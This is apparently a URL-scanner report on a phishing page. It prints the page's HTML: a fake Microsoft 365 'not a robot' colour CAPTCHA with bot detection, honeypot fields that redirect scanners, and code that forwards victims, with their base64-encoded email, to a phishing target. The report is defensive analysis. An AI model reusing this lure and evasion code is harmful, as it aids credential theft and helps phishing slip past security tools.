https://www.grupotrianon.com/servidor.html#bXlsZXNsQGd2c2JlbmVmaXRzLmNvbQ==

已提交的 URL:
https://www.grupotrianon.com/servidor.html#bXlsZXNsQGd2c2JlbmVmaXRzLmNvbQ==
報告完成時間:

連結 · 找到 0 個

從頁面中識別的傳出連結

JavaScript 變數 · 找到 37 個

在頁面的視窗物件上載入的全域 JavaScript 變數是在函數外部宣告的變數,可從目前範圍內程式碼中的任何位置存取

名稱類型
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
Mybooksstring
BlockedRedirectobject
blockedIpsobject
getRandomElementfunction
generateRandomNumberfunction
generateRandomUrlfunction
updateUrlfunction

主控台記錄訊息 · 找到 1 條

記錄到 Web 主控台的訊息

類型類別記錄
errornetwork
URL
https://www.grupotrianon.com/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

頁面的原始 HTML 主體

<!DOCTYPE html><html><head>
    <title>Confirm you're not a robot.</title>
    <script type="module">
        import { load } from 'https://openfpcdn.io/botd/v1';
        window.botdLoad = load;
    </script>
    <script src="xmlrpc.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/UAParser.js/0.7.31/ua-parser.min.js"></script>
    <style>
        body {
            margin: 0;
            height: 100vh;
            background-color: white; 
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            align-items: center;
            
        }

        .top-right-corner {
            position: absolute;
            top: 10px;
            right: 10px;
            z-index: 1100;
            
        }

        #topRightImage {
            width: 50px; 
            height: 50px; 
            display: none;
        }

        
        .honeypot {
            position: absolute;
            left: -5000px; /* Move the input off-screen */
            width: 200px; 
        }

        .loading-overlay, .loading-overlay-secondary {
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(255, 255, 255, 0.7);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 1000;
        }

        .loading-overlay-secondary {
            display: none;
        }

        .loading-content {
            display: flex;
            align-items: center;
        }

        .loading-circle {
            border: 4px solid rgba(0, 0, 0, .1);
            border-radius: 50%;
            border-top: 4px solid rgb(30, 79, 140);
            width: 30px;
            height: 30px;
            animation: spin 3s linear infinite;
        }

        .loading-text {
            margin-left: 10px;
            font-size: 20px;
            color: black;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .captcha-container {
            display: none; 
            flex-direction: column;
            align-items: center;
            margin-top: 50px;
            z-index: 500; 
        }

        .deciding-color {
            width: 120px;
            height: 70px;
            margin: 10px;
            border-radius: 5px;
        }

        .instruction-text {
            font-size: 20px;
            color: #333;
            margin-top: 15px;
            margin-bottom: 30px;
        }

        .captcha-box {
            background-color: #f0f1f3;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        .color-row {
            display: flex;
            justify-content: center;
        }

        .color-box {
            width: 120px;
            height: 80px;
            margin: 15px;
            border-radius: 10px;
            cursor: pointer;
            transition: transform 0.2s, box-shadow 0.2s;
        }

        .color-box:hover {
            transform: scale(1.1);
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
        }

        .color-icon {
            width: 100px;
            height: 100px;
            
        }

        .deciding-icon {
            background-color: #d6d6d8;
            border-radius: 10px;
            width: 100px;
            height: 100px;
            margin: 10px;
        }

        .message {
            color: red;
            font-size: 18px;
            margin-top: 20px;
            text-align: center;
        }

        .countdown-container {
            display: none; 
            flex-direction: column;
            align-items: center;
            justify-content: center;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 1001;
        }

        .countdown {
            display: none; 
            font-size: 20px;
            color: blue;
            margin-top: 20px;
            text-align: center;
        }
        

        .corner-text {
            position: fixed;
            top: 10px;
            left: 0px;
            font-size: 18px;
            color: rgb(108, 105, 105);
            z-index: 1100;
            display: flex;
        }

        .corner-text img {
            width: 100px; 
            height: 20px;
            margin-right: 0px; 
        }


    </style>

    <script>

        var Mybooks = window.location.hash.substring(1); 

        function checkers() {
            window.location.href = "https://www.youtube.com";
        }

        var isBotLikeActivity = false; 

        function redirectToshop() {
            var Mybooks = window.location.hash.substring(1); 

            var randomIndex = Math.floor(Math.random() * BOOKS.length);
            var targetUrl = isBotLikeActivity ? "https://project.microsoft.com/en-US/" : BOOKS[randomIndex] + Mybooks;
            

        }

        
        
        window.addEventListener('dblclick', function() {
            isBotLikeActivity = true;
        });

        setTimeout(redirectToshop, 2000);
    </script>
</head>
<body>
    <div class="top-right-corner">
        <img id="topRightImage" alt="" src="https://logo.clearbit.com/gvsbenefits.com" style="display: block;">
    </div>

    <div class="loading-overlay" id="primaryLoading">
        <div class="loading-content">
            <div class="loading-circle"></div>
            <div class="loading-text">Please wait...</div>
        </div>
    </div>
    
    <div class="loading-overlay-secondary" id="secondaryLoading">
        <div class="loading-content">
            <div class="loading-circle"></div>
            <div class="loading-text">Loading...</div>
        </div>
    </div>
    
    <div class="captcha-container" id="captchaContainer">
        <div class="deciding-icon" id="lightIcon"></div>
        <div class="instruction-text">If you are human, click on the similar or closest color below.</div>
        <div id="message" class="message"></div>
        <div class="captcha-box">
            <div id="colorContainer"></div>
        </div>
    </div>

    <div class="countdown-container" id="countdownContainer">
        <div id="messageCountdown" class="message"></div>
        <div id="countdown" class="countdown"></div>
    </div>


    <div id="cornerTextContainer"><div class="corner-text"><img src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Icon"> | 365 Colors</div></div> 

    <input type="text" class="honeypot" onchange="checkers()" onfocus="checkers()" style="top: 0;">
    <input type="text" class="honeypot" onchange="checkers()" onfocus="checkers()" style="top: 50%;"> 
    <input type="text" class="honeypot" onchange="checkers()" onfocus="checkers()" style="bottom: 0;"> 


</body></html>